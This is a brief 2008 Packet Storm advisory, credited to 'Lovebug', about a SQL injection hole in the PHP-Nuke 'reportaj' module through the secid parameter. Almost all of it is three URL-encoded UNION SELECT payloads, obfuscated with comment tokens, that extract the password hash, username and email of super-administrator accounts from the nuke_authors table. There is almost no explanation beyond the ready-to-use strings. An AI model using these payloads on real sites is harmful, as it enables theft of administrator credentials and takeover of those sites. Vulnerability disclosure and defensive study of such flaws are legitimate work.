phpnukereportaj-sql.txt

2008-02-26T00:00:00
ID PACKETSTORM:64060
Type packetstorm
Reporter Lovebug
Modified 2008-02-26T00:00:00

Description

                                        
                                            `  
  
  
PHP-Nuke (reportaj) SQL Injection Vulnerability [secid]  
  
#modules.php?name=roportaj&op=listarticles&secid=  
  
  
pwd = -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A  
  
  
user= -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A  
  
  
  
email= -1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cemail%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A  
`